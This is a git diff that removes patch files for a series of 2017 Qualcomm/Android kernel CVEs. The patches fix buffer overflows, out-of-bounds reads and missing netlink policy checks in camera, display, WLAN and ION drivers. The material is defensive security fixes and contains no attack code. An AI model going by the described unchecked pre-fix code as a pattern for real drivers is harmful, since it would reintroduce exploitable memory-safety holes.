-diff --git a/drivers/media/platform/msm/camera_v2/msm.c b/drivers/media/platform/msm/camera_v2/msm.c
-index e517f0f589ce6..47ba2f99dd001 100644
---- a/drivers/media/platform/msm/camera_v2/msm.c
-+++ b/drivers/media/platform/msm/camera_v2/msm.c
-@@ -334,6 +334,11 @@ static void msm_add_sd_in_position(struct msm_sd_subdev *msm_subdev,
- 	struct msm_sd_subdev *temp_sd;
- 
- 	list_for_each_entry(temp_sd, sd_list, list) {
-+		if (temp_sd == msm_subdev) {
-+			pr_err("%s :Fail to add the same sd %d\n",
-+				__func__, __LINE__);
-+			return;
-+		}
- 		if (msm_subdev->close_seq < temp_sd->close_seq) {
- 			list_add_tail(&msm_subdev->list, &temp_sd->list);
- 			return;
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-index 877021edc776d..4243005beff50 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-@@ -17,7 +17,8 @@
- #undef CDBG
- #define CDBG(fmt, args...) pr_debug(fmt, ##args)
- #define S_I2C_DBG(fmt, args...) pr_debug(fmt, ##args)
--
-+#define MAX_I2C_ADDR_TYPE_SIZE (MSM_CAMERA_I2C_3B_ADDR + 1)
-+#define MAX_I2C_DATA_TYPE_SIZE (MSM_CAMERA_I2C_SET_BYTE_WRITE_MASK_DATA + 1)
- #define I2C_COMPARE_MATCH 0
- #define I2C_COMPARE_MISMATCH 1
- #define I2C_POLL_MAX_ITERATION 20
-@@ -27,7 +28,7 @@ int32_t msm_camera_cci_i2c_read(struct msm_camera_i2c_client *client,
- 	enum msm_camera_i2c_data_type data_type)
- {
- 	int32_t rc = -EFAULT;
--	unsigned char buf[client->addr_type+data_type];
-+	unsigned char buf[MAX_I2C_ADDR_TYPE_SIZE + MAX_I2C_DATA_TYPE_SIZE];
- 	struct msm_camera_cci_ctrl cci_ctrl;
- 
- 	if ((client->addr_type != MSM_CAMERA_I2C_BYTE_ADDR
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_driver.c b/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_driver.c
-index 5d3c56191e0d4..bd376ffa28c10 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_driver.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_driver.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2015,2017 The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -103,7 +103,11 @@ static int32_t msm_sensor_driver_create_i2c_v4l_subdev
- 	s_ctrl->msm_sd.sd.entity.name =	s_ctrl->msm_sd.sd.name;
- 	s_ctrl->sensordata->sensor_info->session_id = session_id;
- 	s_ctrl->msm_sd.close_seq = MSM_SD_CLOSE_2ND_CATEGORY | 0x3;
--	msm_sd_register(&s_ctrl->msm_sd);
-+	rc = msm_sd_register(&s_ctrl->msm_sd);
-+	if (rc < 0) {
-+		pr_err("failed: msm_sd_register rc %d", rc);
-+		return rc;
-+	}
- 	CDBG("%s:%d\n", __func__, __LINE__);
- 	return rc;
- }
-@@ -133,7 +137,11 @@ static int32_t msm_sensor_driver_create_v4l_subdev
- 	s_ctrl->msm_sd.sd.entity.group_id = MSM_CAMERA_SUBDEV_SENSOR;
- 	s_ctrl->msm_sd.sd.entity.name = s_ctrl->msm_sd.sd.name;
- 	s_ctrl->msm_sd.close_seq = MSM_SD_CLOSE_2ND_CATEGORY | 0x3;
--	msm_sd_register(&s_ctrl->msm_sd);
-+	rc = msm_sd_register(&s_ctrl->msm_sd);
-+	if (rc < 0) {
-+		pr_err("failed: msm_sd_register rc %d", rc);
-+		return rc;
-+	}
- 	msm_sensor_v4l2_subdev_fops = v4l2_subdev_fops;
- #ifdef CONFIG_COMPAT
- 	msm_sensor_v4l2_subdev_fops.compat_ioctl32 =
-@@ -885,12 +893,6 @@ int32_t msm_sensor_driver_probe(void *setting,
- 
- 	pr_err("%s probe succeeded", slave_info->sensor_name);
- 
--	/*
--	  Set probe succeeded flag to 1 so that no other camera shall
--	 * probed on this slot
--	 */
--	s_ctrl->is_probe_succeed = 1;
--
- 	/*
- 	 * Update the subdevice id of flash-src based on availability in kernel.
- 	 */
-@@ -940,6 +942,11 @@ int32_t msm_sensor_driver_probe(void *setting,
- 
- 	msm_sensor_fill_sensor_info(s_ctrl, probed_info, entity_name);
- 
-+	/*
-+	 * Set probe succeeded flag to 1 so that no other camera shall
-+	 * probed on this slot
-+	 */
-+	s_ctrl->is_probe_succeed = 1;
- 	return rc;
- 
- camera_power_down:
diff --git a/Patches/Linux_CVEs/CVE-2017-9706/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-9706/ANY/0001.patch
deleted file mode 100644
index 9735e70c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9706/ANY/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 7489a0a8f68d0f018d0f9df5df157bb20f83b05e Mon Sep 17 00:00:00 2001
-From: Bharath Gopal <gopalb@codeaurora.org>
-Date: Fri, 4 Aug 2017 17:19:24 -0700
-Subject: [PATCH] msm: mdss: Buffer overflow while processing gamut table data
-
-Modified the size of the gamut table data-structure in order to
-avoid a buffer overflow while copying data from user-space.
-
-Bug: 34170483
-Change-Id: I8c5fa1caff450a2d25d7859bd159ab4a60045e54
-Signed-off-by: Bharath Gopal <gopalb@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_mdp_pp.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_mdp_pp.c b/drivers/video/msm/mdss/mdss_mdp_pp.c
-index bd6d2fbd9c26e..a666f4c61d1ab 100644
---- a/drivers/video/msm/mdss/mdss_mdp_pp.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_pp.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -389,7 +389,7 @@ struct mdss_pp_res_type {
- 	struct mdp_hist_lut_data enhist_disp_cfg[MDSS_BLOCK_DISP_NUM];
- 	struct mdp_dither_cfg_data dither_disp_cfg[MDSS_BLOCK_DISP_NUM];
- 	struct mdp_gamut_cfg_data gamut_disp_cfg[MDSS_BLOCK_DISP_NUM];
--	uint16_t gamut_tbl[MDSS_BLOCK_DISP_NUM][GAMUT_TOTAL_TABLE_SIZE];
-+	uint16_t gamut_tbl[MDSS_BLOCK_DISP_NUM][GAMUT_TOTAL_TABLE_SIZE * 3];
- 	u32 hist_data[MDSS_BLOCK_DISP_NUM][HIST_V_SIZE];
- 	struct pp_sts_type pp_disp_sts[MDSS_MAX_MIXER_DISP_NUM];
- 	/* physical info */
diff --git a/Patches/Linux_CVEs/CVE-2017-9714/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-9714/qcacld-2.0/0001.patch
deleted file mode 100644
index 466dbd15..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9714/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,62 +0,0 @@
-From aae237dfbaf8edcf310eeb84b887b20e7e9c0ff3 Mon Sep 17 00:00:00 2001
-From: Kapil Gupta <kapgupta@codeaurora.org>
-Date: Tue, 16 May 2017 12:39:54 +0530
-Subject: qcacld-2.0: Drop assoc request if RSNIE/WPAIE parsing fail
-
-Add changes to drop assoc request and return error if RSNIE or
-WPAIE parsing fail during parsing of assoc request.
-
-CRs-Fixed: 2046578
-Change-Id: I88d779399c2eba5d33c30144bf9600a1f3a00b77
----
- CORE/MAC/src/pe/lim/limProcessAssocReqFrame.c | 23 +++++++++++++++++++----
- 1 file changed, 19 insertions(+), 4 deletions(-)
-
-diff --git a/CORE/MAC/src/pe/lim/limProcessAssocReqFrame.c b/CORE/MAC/src/pe/lim/limProcessAssocReqFrame.c
-index 7aa5464..23d2cf3 100644
---- a/CORE/MAC/src/pe/lim/limProcessAssocReqFrame.c
-+++ b/CORE/MAC/src/pe/lim/limProcessAssocReqFrame.c
-@@ -752,10 +752,18 @@ limProcessAssocReqFrame(tpAniSirGlobal pMac, tANI_U8 *pRxPacketInfo,
-                 if(pAssocReq->rsn.length)
-                 {
-                     // Unpack the RSN IE
--                    dot11fUnpackIeRSN(pMac,
-+                    if (dot11fUnpackIeRSN(pMac,
-                                         &pAssocReq->rsn.info[0],
-                                         pAssocReq->rsn.length,
--                                        &Dot11fIERSN);
-+                                        &Dot11fIERSN) != DOT11F_PARSE_SUCCESS)
-+                    {
-+                        limLog(pMac, LOG1,
-+                            FL("Invalid RSNIE received"));
-+                        limSendAssocRspMgmtFrame(pMac,
-+                            eSIR_MAC_INVALID_RSN_IE_CAPABILITIES_STATUS,
-+                            1, pHdr->sa, subType, 0,psessionEntry);
-+                        goto error;
-+                    }
- 
-                     /* Check RSN version is supported or not */
-                     if(SIR_MAC_OUI_VERSION_1 == Dot11fIERSN.version)
-@@ -821,10 +829,17 @@ limProcessAssocReqFrame(tpAniSirGlobal pMac, tANI_U8 *pRxPacketInfo,
-                 // Unpack the WPA IE
-                 if(pAssocReq->wpa.length)
-                 {
--                    dot11fUnpackIeWPA(pMac,
-+                    if (dot11fUnpackIeWPA(pMac,
-                                         &pAssocReq->wpa.info[4], //OUI is not taken care
-                                         pAssocReq->wpa.length,
--                                        &Dot11fIEWPA);
-+                                        &Dot11fIEWPA) != DOT11F_PARSE_SUCCESS)
-+                    {
-+                        limLog(pMac, LOGE, FL("Invalid WPA IE"));
-+                        limSendAssocRspMgmtFrame(pMac,
-+                                eSIR_MAC_INVALID_INFORMATION_ELEMENT_STATUS,
-+                                1, pHdr->sa, subType, 0,psessionEntry);
-+                        goto error;
-+                    }
-                     /* check the groupwise and pairwise cipher suites */
-                     if(eSIR_SUCCESS != (status = limCheckRxWPAIeMatch(pMac, Dot11fIEWPA, psessionEntry, pAssocReq->HTCaps.present)))
-                     {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9715/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-9715/qcacld-2.0/0001.patch
deleted file mode 100644
index 03c5244b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9715/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 58350a7bcb827c0ac81f0750a62d5c5a8ed3a469 Mon Sep 17 00:00:00 2001
-From: Jeff Johnson <jjohnson@codeaurora.org>
-Date: Tue, 6 Jun 2017 08:56:33 -0700
-Subject: qcacld-2.0: Avoid extscan bucket spec overread
-
-Currently in hdd_extscan_start_fill_bucket_channel_spec() the
-QCA_WLAN_VENDOR_ATTR_EXTSCAN_BUCKET_SPEC attribute is parsed without
-specifying a policy. This means that no policy is enforced.
-Subsequently the values of the nested attributes are retrieved, but
-again without any length limits enforced. This could result in a
-buffer overread.
-To prevent this issue:
-* Parse using the existing policy wlan_hdd_extscan_config_policy
-* Update the policy to add missing attributes
-
-Change-Id: I3b20cb28d1beccd2e804b022b531413ad1edb533
-CRs-Fixed: 2057034
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 8 ++++++--
- 1 file changed, 6 insertions(+), 2 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 1f6be81..078b4fd 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -850,6 +850,9 @@ wlan_hdd_extscan_config_policy[QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_LOST_AP_SAMPLE_SIZE] = { .type = NLA_U32 },
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_MIN_BREACHING] = { .type = NLA_U32 },
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_NUM_AP] = { .type = NLA_U32 },
-+    [QCA_WLAN_VENDOR_ATTR_EXTSCAN_BUCKET_SPEC_MAX_PERIOD] = { .type = NLA_U32 },
-+    [QCA_WLAN_VENDOR_ATTR_EXTSCAN_BUCKET_SPEC_BASE] = { .type = NLA_U32 },
-+    [QCA_WLAN_VENDOR_ATTR_EXTSCAN_BUCKET_SPEC_STEP_COUNT] = { .type = NLA_U32 },
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_THRESHOLD_PARAM_SSID] = { .type = NLA_BINARY,
- 							.len = IEEE80211_MAX_SSID_LEN + 1 },
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_HOTLIST_PARAMS_LOST_SSID_SAMPLE_SIZE] = { .type = NLA_U32 },
-@@ -3533,8 +3536,9 @@ static int hdd_extscan_start_fill_bucket_channel_spec(
- 		}
- 
- 		if (nla_parse(bucket,
--			QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_MAX,
--			nla_data(buckets), nla_len(buckets), NULL)) {
-+			      QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_MAX,
-+			      nla_data(buckets), nla_len(buckets),
-+			      wlan_hdd_extscan_config_policy)) {
- 			hddLog(LOGE, FL("nla_parse failed"));
- 			return -EINVAL;
- 		}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9717/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-9717/qcacld-2.0/0001.patch
deleted file mode 100644
index 606c231e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9717/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From bf7486fb6d82fb9ad02e303b6fdf4061cfc0375d Mon Sep 17 00:00:00 2001
-From: SaidiReddy Yenuga <saidir@codeaurora.org>
-Date: Thu, 25 May 2017 15:53:53 +0530
-Subject: qcacld-2.0: Add get valid channels entry to NLA policy
-
-improper validation of
-QCA_WLAN_VENDOR_ATTR_EXTSCAN_GET_VALID_CHANNELS_CONFIG_PARAM_MAX_CHANNELS.
-
-validate QCA_WLAN_VENDOR_ATTR_EXTSCAN_GET_VALID_CHANNELS_CONFIG_PARAM_MAX_CHANNELS.
-
-CRs-Fixed: 2051450
-Change-Id: I16e5808492b5b35dc8b646af45d6ac6d65561804
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 837e407..9d18fd3 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -822,6 +822,7 @@ wlan_hdd_extscan_config_policy[QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_
- {
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_REQUEST_ID] = { .type = NLA_U32 },
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_GET_VALID_CHANNELS_CONFIG_PARAM_WIFI_BAND] = { .type = NLA_U32 },
-+    [QCA_WLAN_VENDOR_ATTR_EXTSCAN_GET_VALID_CHANNELS_CONFIG_PARAM_MAX_CHANNELS] = { .type = NLA_U32 },
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_CHANNEL_SPEC_CHANNEL] = { .type = NLA_U32 },
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_CHANNEL_SPEC_DWELL_TIME] = { .type = NLA_U32 },
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_CHANNEL_SPEC_PASSIVE] = { .type = NLA_U8 },
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9719/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-9719/3.18/0001.patch
deleted file mode 100644
index ed13eefa..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9719/3.18/0001.patch
+++ /dev/null
@@ -1,47 +0,0 @@
-From a491499c3490999555b7ccf8ad1a7d6455625807 Mon Sep 17 00:00:00 2001
-From: zhaoyuan <yzhao@codeaurora.org>
-Date: Mon, 20 Feb 2017 13:42:20 +0800
-Subject: msm: mdss: hdmi: check up-bound of CEC frame size
-
-the spec says the frame size will not be greater than
-14, but this have a security hole when somebody sends
-a message with a size greater than 14. So need check
-up-boud of the CEC frame size.
-
-Change-Id: I743208badc5e77ae911cfb2d102f758d4843138f
-Signed-off-by: zhaoyuan <yzhao@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_hdmi_cec.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_hdmi_cec.c b/drivers/video/msm/mdss/mdss_hdmi_cec.c
-index a424d98..a4ed012 100644
---- a/drivers/video/msm/mdss/mdss_hdmi_cec.c
-+++ b/drivers/video/msm/mdss/mdss_hdmi_cec.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -196,7 +196,7 @@ static void hdmi_cec_msg_recv(struct work_struct *work)
- 		msg.sender_id, msg.recvr_id,
- 		msg.frame_size);
- 
--	if (msg.frame_size < 1) {
-+	if (msg.frame_size < 1 || msg.frame_size > MAX_CEC_FRAME_SIZE) {
- 		DEV_ERR("%s: invalid message (frame length = %d)\n",
- 			__func__, msg.frame_size);
- 		return;
-@@ -216,7 +216,7 @@ static void hdmi_cec_msg_recv(struct work_struct *work)
- 		msg.operand[i] = data & 0xFF;
- 	}
- 
--	for (; i < 14; i++)
-+	for (; i < MAX_OPERAND_SIZE; i++)
- 		msg.operand[i] = 0;
- 
- 	DEV_DBG("%s: opcode 0x%x, wakup_en %d, device_suspend %d\n", __func__,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9719/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-9719/4.4/0002.patch
deleted file mode 100644
index 3c4d99fe..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9719/4.4/0002.patch
+++ /dev/null
@@ -1,47 +0,0 @@
-From d815f54f15d765b5e0035a9d208d71567bcaace0 Mon Sep 17 00:00:00 2001
-From: zhaoyuan <yzhao@codeaurora.org>
-Date: Mon, 20 Feb 2017 13:42:20 +0800
-Subject: msm: mdss: hdmi: check up-bound of CEC frame size
-
-the spec says the frame size will not be greater than
-14, but this have a security hole when somebody sends
-a message with a size greater than 14. So need check
-up-boud of the CEC frame size.
-
-Change-Id: I743208badc5e77ae911cfb2d102f758d4843138f
-Signed-off-by: zhaoyuan <yzhao@codeaurora.org>
----
- drivers/video/fbdev/msm/mdss_hdmi_cec.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/video/fbdev/msm/mdss_hdmi_cec.c b/drivers/video/fbdev/msm/mdss_hdmi_cec.c
-index a424d98..a4ed012 100644
---- a/drivers/video/fbdev/msm/mdss_hdmi_cec.c
-+++ b/drivers/video/fbdev/msm/mdss_hdmi_cec.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -196,7 +196,7 @@ static void hdmi_cec_msg_recv(struct work_struct *work)
- 		msg.sender_id, msg.recvr_id,
- 		msg.frame_size);
- 
--	if (msg.frame_size < 1) {
-+	if (msg.frame_size < 1 || msg.frame_size > MAX_CEC_FRAME_SIZE) {
- 		DEV_ERR("%s: invalid message (frame length = %d)\n",
- 			__func__, msg.frame_size);
- 		return;
-@@ -216,7 +216,7 @@ static void hdmi_cec_msg_recv(struct work_struct *work)
- 		msg.operand[i] = data & 0xFF;
- 	}
- 
--	for (; i < 14; i++)
-+	for (; i < MAX_OPERAND_SIZE; i++)
- 		msg.operand[i] = 0;
- 
- 	DEV_DBG("%s: opcode 0x%x, wakup_en %d, device_suspend %d\n", __func__,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9720/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-9720/3.10/0001.patch
deleted file mode 100644
index ef6036d0..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9720/3.10/0001.patch
+++ /dev/null
@@ -1,30 +0,0 @@
-From c74dbab508c7c07d8e2cf8230cc78bff4b710272 Mon Sep 17 00:00:00 2001
-From: Fei Zhang <feizhang@codeaurora.org>
-Date: Wed, 17 May 2017 15:33:02 +0800
-Subject: msm:camera: correct stats query out of boundary
-
-fix one potential out of boundary query of stats info.
-
-Bug: 36264696
-Change-Id: I13e4bf8802fcce529f9268c272e4727619d5ad8f
-Signed-off-by: Fei Zhang <feizhang@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-index a0eed95..82da3e0 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-@@ -803,7 +803,7 @@ int msm_isp_update_stats_stream(struct vfe_device *vfe_dev, void *arg)
- 		update_info = &update_cmd->update_info[i];
- 		/*check array reference bounds*/
- 		if (STATS_IDX(update_info->stream_handle)
--			> vfe_dev->hw_info->stats_hw_info->num_stats_type) {
-+			>= vfe_dev->hw_info->stats_hw_info->num_stats_type) {
- 			pr_err("%s: stats idx %d out of bound!", __func__,
- 				STATS_IDX(update_info->stream_handle));
- 			return -EINVAL;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9720/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-9720/3.18/0002.patch
deleted file mode 100644
index fbda8515..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9720/3.18/0002.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 737f415a5c637802786ec6d36288220cb4d3ae4d Mon Sep 17 00:00:00 2001
-From: Fei Zhang <feizhang@codeaurora.org>
-Date: Wed, 17 May 2017 14:14:54 +0800
-Subject: msm:camera: correct stats query out of boundary
-
-fix one potential out of boundary query of stats info.
-
-Change-Id: I13e4bf8802fcce529f9268c272e4727619d5ad8f
-Signed-off-by: Fei Zhang <feizhang@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
- mode change 100644 => 100755 drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-old mode 100644
-new mode 100755
-index d4d2c82..8d2d8e7
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-@@ -885,7 +885,7 @@ int msm_isp_update_stats_stream(struct vfe_device *vfe_dev, void *arg)
- 				&update_cmd->update_info[i];
- 		/*check array reference bounds*/
- 		if (STATS_IDX(update_info->stream_handle)
--			> vfe_dev->hw_info->stats_hw_info->num_stats_type) {
-+			>= vfe_dev->hw_info->stats_hw_info->num_stats_type) {
- 			pr_err("%s: stats idx %d out of bound!", __func__,
- 			STATS_IDX(update_info->stream_handle));
- 			return -EINVAL;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9720/3.18/0003.patch b/Patches/Linux_CVEs/CVE-2017-9720/3.18/0003.patch
deleted file mode 100644
index 2b1f0f4c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9720/3.18/0003.patch
+++ /dev/null
@@ -1,30 +0,0 @@
-From 2c5616295a5411812188f515d6ecf1984b9c1798 Mon Sep 17 00:00:00 2001
-From: Terence Ho <terenceh@codeaurora.org>
-Date: Wed, 14 Jun 2017 14:17:50 -0400
-Subject: msm:camera: correct stats query out of boundary
-
-fix one potential out of boundary query of stats info.
-
-Change-Id: Ic3224f2f08e6dd2bb05a846d0300df251f9fb192
-CRs-Fixed: 2041066
-Signed-off-by: Terence Ho <terenceh@codeaurora.org>
----
- drivers/media/platform/msm/ais/isp/msm_isp_stats_util.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/ais/isp/msm_isp_stats_util.c b/drivers/media/platform/msm/ais/isp/msm_isp_stats_util.c
-index feb4a62..1b24a13 100644
---- a/drivers/media/platform/msm/ais/isp/msm_isp_stats_util.c
-+++ b/drivers/media/platform/msm/ais/isp/msm_isp_stats_util.c
-@@ -890,7 +890,7 @@ int msm_isp_update_stats_stream(struct vfe_device *vfe_dev, void *arg)
- 				&update_cmd->update_info[i];
- 		/* check array reference bounds */
- 		if (STATS_IDX(update_info->stream_handle)
--			> vfe_dev->hw_info->stats_hw_info->num_stats_type) {
-+			>= vfe_dev->hw_info->stats_hw_info->num_stats_type) {
- 			pr_err("%s: stats idx %d out of bound!", __func__,
- 			STATS_IDX(update_info->stream_handle));
- 			return -EINVAL;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9724/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-9724/ANY/0001.patch
deleted file mode 100644
index e613bef7..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9724/ANY/0001.patch
+++ /dev/null
@@ -1,69 +0,0 @@
-From 5328a92fa26eabe2ba259b1d813f9de488efc9ec Mon Sep 17 00:00:00 2001
-From: "Se Wang (Patrick) Oh" <sewango@codeaurora.org>
-Date: Mon, 29 Jun 2015 11:43:39 -0700
-Subject: ion: Fix unprotected userspace access
-
-After enabling KASan, unprotected userspace access causes
-a PTE translation fault as it can covers only kernel memory
-region. Following is the crash error for the reference.
-
-Unable to handle kernel paging request at virtual address dfffff901ff64b84
-pgd = ffffffc083266000
-[dfffff901ff64b84] *pgd=0000000000000000, *pud=0000000000000000
-Internal error: Oops: 96000004 [#1] PREEMPT SMP
-Modules linked in:
-CPU: 1 PID: 8527 Comm: iveaudiolatency Tainted: G        W      3.18.0-g5a4a5d5-07255-g8e80921-dirty #21
-Hardware name: Qualcomm Technologies, Inc. MSM 8996 v2 + PMI8994 MTP (DT)
-task: ffffffc02bfeb600 ti: ffffffc083378000 task.ti: ffffffc083378000
-PC is at compat_msm_ion_ioctl+0x23c/0x614
-LR is at compat_msm_ion_ioctl+0x1d8/0x614
-pc : [<ffffffc0012bd570>] lr : [<ffffffc0012bd50c>] pstate: 80000145
-sp : ffffffc08337faf0
-x29: ffffffc08337faf0 x28: 0000000000000000
-x27: ffffffc083378000 x26: 00000000ffb25c20
-x25: 00000000e2fa6000 x24: 0000000000000000
-x23: 00000000ffb25c18 x22: 0000000000000000
-x21: ffffffc08fcaa640 x20: 00000000c0144d00
-x19: 00000000ffb25c74 x18: 0000000000000000
-x17: 0000000000000000 x16: ffffffc000385a88
-x15: 0000000000000000 x14: 00000000f73517c9
-x13: 00000000ffb25c30 x12: 0000000000000001
-x11: 00000000ffffffff x10: ffffff881066ff3a
-x9 : 1ffffff81066ff3a x8 : dfffff9000000000
-x7 : 0000000000000036 x6 : ffffffc08337f9d4
-x5 : 0000000000000003 x4 : 00000000ffb25c30
-x3 : ffffffc0012bd334 x2 : 0000000000000001
-x1 : 000000001ff64b84 x0 : dfffff9000000000
-
-Process iveaudiolatency (pid: 8527, stack limit = 0xffffffc083378058)
-Call trace:
-[<ffffffc0012bd570>] compat_msm_ion_ioctl+0x23c/0x614
-[<ffffffc0012aea84>] ion_ioctl+0x4dc/0x680
-[<ffffffc0012bb254>] compat_ion_ioctl+0xb98/0xbc0
-[<ffffffc000385d10>] compat_SyS_ioctl+0x288/0x2048
-Code: 910022fa d2dff200 d343ff41 f2fbffe0 (38e06820)
----[ end trace 490ef1c3bde7b96c ]---
-coresight-tmc 3028000.tmc: TMC aborted
-
-Change-Id: I7595bbf5f311182d40f7158654df56dc8bcf672a
-Signed-off-by: Se Wang (Patrick) Oh <sewango@codeaurora.org>
----
- drivers/staging/android/ion/msm/compat_msm_ion.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/staging/android/ion/msm/compat_msm_ion.c b/drivers/staging/android/ion/msm/compat_msm_ion.c
-index c34b3a7..ddb9fc7 100644
---- a/drivers/staging/android/ion/msm/compat_msm_ion.c
-+++ b/drivers/staging/android/ion/msm/compat_msm_ion.c
-@@ -58,7 +58,7 @@ static int compat_get_ion_flush_data(
- 	err |= put_user(i, &data->fd);
- 	err |= get_user(u, &data32->vaddr);
- 	/* upper bits won't get set, zero them */
--	data->vaddr = NULL;
